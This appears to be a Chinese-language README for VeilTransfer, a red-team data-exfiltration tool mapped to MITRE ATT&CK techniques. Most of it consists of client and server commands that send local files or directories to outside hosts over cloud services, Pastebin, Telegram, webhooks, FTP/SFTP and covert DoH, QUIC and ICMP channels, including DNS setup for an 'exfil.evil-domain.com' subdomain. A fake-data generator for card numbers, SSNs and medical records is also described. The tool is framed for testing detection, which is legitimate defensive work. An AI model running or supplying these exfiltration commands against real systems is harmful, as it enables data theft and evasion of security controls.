infosecn1nja/VeilTransfer

# VeilTransfer 2.0 VeilTransfer 是一个用于测试和增强检测能力的数据外泄工具。该工具模拟了高级威胁行为者使用的真实世界数据外泄技术，使组织能够评估和改进其安全态势。通过利用 MEGA、GitHub、Dropbox、Telegram、Pastebin、WebDAV 等多种外泄方法，VeilTransfer 帮助识别防御中的漏洞，并确保您的安全解决方案能够应对现代数据泄露。 ## 支持的外泄方法 - MEGA - GitHub - Dropbox - Telegram - Pastebin - WebDAV - Webhook - SFTP - FTP - DoH（通过 HTTPS 的 DNS） - QUIC - ICMP ## MITRE ATT&CK 映射 |ID|技术| |--|---------| |T1029|计划传输| |T1020|自动外泄| |T1132.001|数据编码：标准编码| |T1560.002|收集的数据存档：通过库进行存档| |T1567.001|通过 Web 服务外泄：外泄至代码仓库| |T1567.002|通过 Web 服务外泄：外泄至云存储| |T1567.003|通过 Web 服务外泄：外泄至文本存储站点| |T1567.004|通过 Web 服务外泄：外泄至 Webhook| |T1048.003|通过替代协议外泄：通过未加密的非 C2 协议外泄| |T1048.002|通过替代协议外泄：通过非对称加密的非 C2 协议外泄| ## 额外功能 ### 伪造数据生成 VeilTransfer 还支持生成伪造数据，包括： - **印度尼西亚身份证（KTP）号码**：生成真实的 KTP 号码及相关数据。 - **信用卡信息**：创建符合 PCI DSS 格式的伪造信用卡详情，包括姓名、信用卡号（Visa/MasterCard/AMEX）和过期日期。 - **社会安全号码（SSN）**：生成用于模拟和测试环境的伪造 SSN。 - **医疗记录**：生成印尼（id）或英文（en）的伪造医疗记录数据。 ### 创建压缩文件 轻松创建压缩文件以打包和压缩数据，随后可用于外泄或测试不同场景。支持按大小拆分为多个文件。 ## 示例用例 * **红队操作**：在红队演练中部署 VeilTransfer，使用复杂且真实的外泄场景挑战蓝队。 * **紫队协作**：与防御团队合作，模拟并检测外泄尝试，精进进攻与防御战术。 * **安全测试**：使用 VeilTransfer 验证 DLP、NDR、防火墙及其他网络安全措施的有效性。 ## 示例用法 ### 传输 #### 通过 SFTP 传输文件 本示例演示如何使用 SFTP 协议将文件安全传输到远程服务器。文件位于本地机器，并通过 SSH 认证传输到指定的远程目录。 ``` veiltransfer_client transfer sftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server example.com:22 -username user -password pass ``` #### 将文件传输到 WebDAV 服务器 在此示例中，将本地目录中的文件上传至 WebDAV 服务器。服务器需要用户名和密码进行认证。服务器参数包含 URI 方案（https:// 或 http://）。 ``` veiltransfer_client transfer webdav -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server http://webdav.example.com:8080 -username user -password pass ``` #### 将文件传输到 Mega 云存储 本示例展示如何将文件传输到 Mega 云存储。文件从指定的本地目录上传，认证使用用户的 Mega 云凭证。 ``` veiltransfer_client transfer mega -localPath (/path/to/file or /path/to/directory) -username megauser@example.com -password megasecretpassword ``` #### 通过 FTP 传输文件 本示例中，文件被上传至 FTP 服务器。文件传输到远程服务器上的特定目录。服务器需要用户名和密码进行认证。 ``` veiltransfer_client transfer ftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server ftp.example.com:21 -username ftpuser -password ftppassword ``` #### 上传文件到 Pastebin 本示例演示如何将文件内容上传到 Pastebin。内容使用用户提供的 API 密钥提交到 Pastebin。 ``` veiltransfer_client transfer pastebin -localPath (/path/to/file or /path/to/directory) -apiKey your_pastebin_api_key ``` #### 向 GitHub 仓库发送文件 本示例展示如何将文件从本地机器推送到特定的 GitHub 仓库。文件通过用户的 GitHub API 令牌进行认证后添加到仓库。 ``` veiltransfer_client transfer github -localPath (/path/to/file or /path/to/directory) -repo yourusername/repository -apiKey your_github_api_token ``` #### 向 Telegram 频道发送文件 本示例演示如何向特定的 Telegram 频道发送文件。文件使用 Telegram 机器人 API 令牌发送，消息发送到指定的频道 ID。 ``` veiltransfer_client transfer telegram -localPath (/path/to/file or /path/to/directory) -telegramAPI your_telegram_bot_api_token -channelID 123456789 ``` #### 向 Webhook URL 发送数据 在此示例中，将文件内容发送到指定的 Webhook URL。 ``` veiltransfer_client transfer webhook -localPath (/path/to/file or /path/to/directory) -webhookURL https://webhook.site/your-webhook-url ``` #### 通过 DoH（DNS over HTTPS）传输文件 要建立利用 DNS over HTTPS（DoH）的安全数据外泄机制，需要配置以下 DNS 记录： 1. A 记录：将 test 指向 IP 地址 。 test -> 2. NS 记录：定义一个由 evil-domain.com 管理的子域（exfil）。 exfil -> test.evil-domain.com 域名 exfil.evil-domain.com 将作为 DNS 外泄域。 然后，使用以下命令以 DoH 模式启动 VeilTransfer 服务器： ``` veiltransfer_server doh -key ag36rjsg284nfk2g -folder /root/data/exfil ``` 注意：加密密钥（-key）必须为 16 或 32 个字符。 要通过 DoH 上传文件，请确保 VeilTransfer 服务器已使用有效的加密密钥在 DoH 模式下积极运行。然后，使用以下客户端命令启动传输： ``` veiltransfer_client transfer doh -localPath /path/to/file_or_directory -key ag36rjsg284nfk2g -dnsServer exfil.evil-domain.com ``` #### 通过 QUIC 传输文件 要启动 QUIC 模式下的 VeilTransfer 服务器，请使用以下命令： ``` veiltransfer_server quic -cert /path/server.crt -key /path/server.key ``` 服务器运行后，可以使用以下命令上传文件或目录： ``` veiltransfer_client transfer quic -localPath (/path/to/file or /path/to/directory) -server example.com:443 ``` #### 通过 ICMP 传输文件 要通过 ICMP 协议启用文件传输，请执行以下命令以 ICMP 模式启动 VeilTransfer 服务器： ``` veiltransfer_server_linux icmp -folder /path/folder ``` 服务器激活后，执行以下命令通过 ICMP 传输文件或目录： ``` veiltransfer_client_linux transfer icmp -localPath (/path/to/file or /path/to/directory) -server ``` ### 创建压缩文件 #### 创建简单压缩文件 从指定目录创建 zip 归档文件。 ``` veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip ``` #### 创建分卷压缩文件 创建按指定大小拆分为多个部分的 zip 归档文件。 ``` veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip -splitSize 1000000 ``` ### 数据生成器 #### 生成 100 条伪造信用卡号码 本示例展示如何生成 100 条伪造的信用卡数据。生成的数据将包括信用卡号、过期日期及相关详情。 ``` veiltransfer_client generate-fake -ccn -count 100 ``` #### 生成 50 条伪造的印度尼西亚 KTP 条目 本示例展示如何生成 50 条伪造的 KTP 数据。数据包括姓名、地址和 KTP 号码等个人信息。 ``` veiltransfer_client generate-fake -ktp -count 50 ``` #### 生成 200 条伪造的社会安全号码 生成的数据符合美国标准的社会安全号码格式。 ``` veiltransfer_client generate-fake -ssn -count 200 ``` #### 生成 300 条英文伪造医疗记录 本示例展示如何生成 300 条英文伪造医疗记录。 ``` veiltransfer_client generate-fake -medical-record -count 300 -language en ``` ## 贡献 欢迎对 VeilTransfer 贡献！如果您有关于新功能、外泄方法或改进的想法，请提交拉取请求或在 GitHub 上打开问题。

标签：DNS over HTTPS, DoH, Dropbox, EVTX分析, ICMP, KTP, MEGA, Pastebin, QUIC, SSN生成, Telegram, URL发现, VeilTransfer, WebDAV, Webhook, Webhook外泄, ZIP归档, 云存储外泄, 代码仓库外泄, 信用卡生成, 假数据生成, 力导向图, 医疗记录生成, 印尼医疗数据, 压缩数据, 反取证, 安全检测, 安全测试, 安全评估, 库归档, 攻击性安全, 数据外泄, 数据外泄工具, 数据展示, 数据泄露工具, 数据渗漏, 数据编码, 文本存储外泄, 日志审计, 替代协议外泄, 标准编码, 检测能力, 红队, 身份证生成, 逆向工具, 隐蔽通道, 非加密协议外泄, 非对称加密协议外泄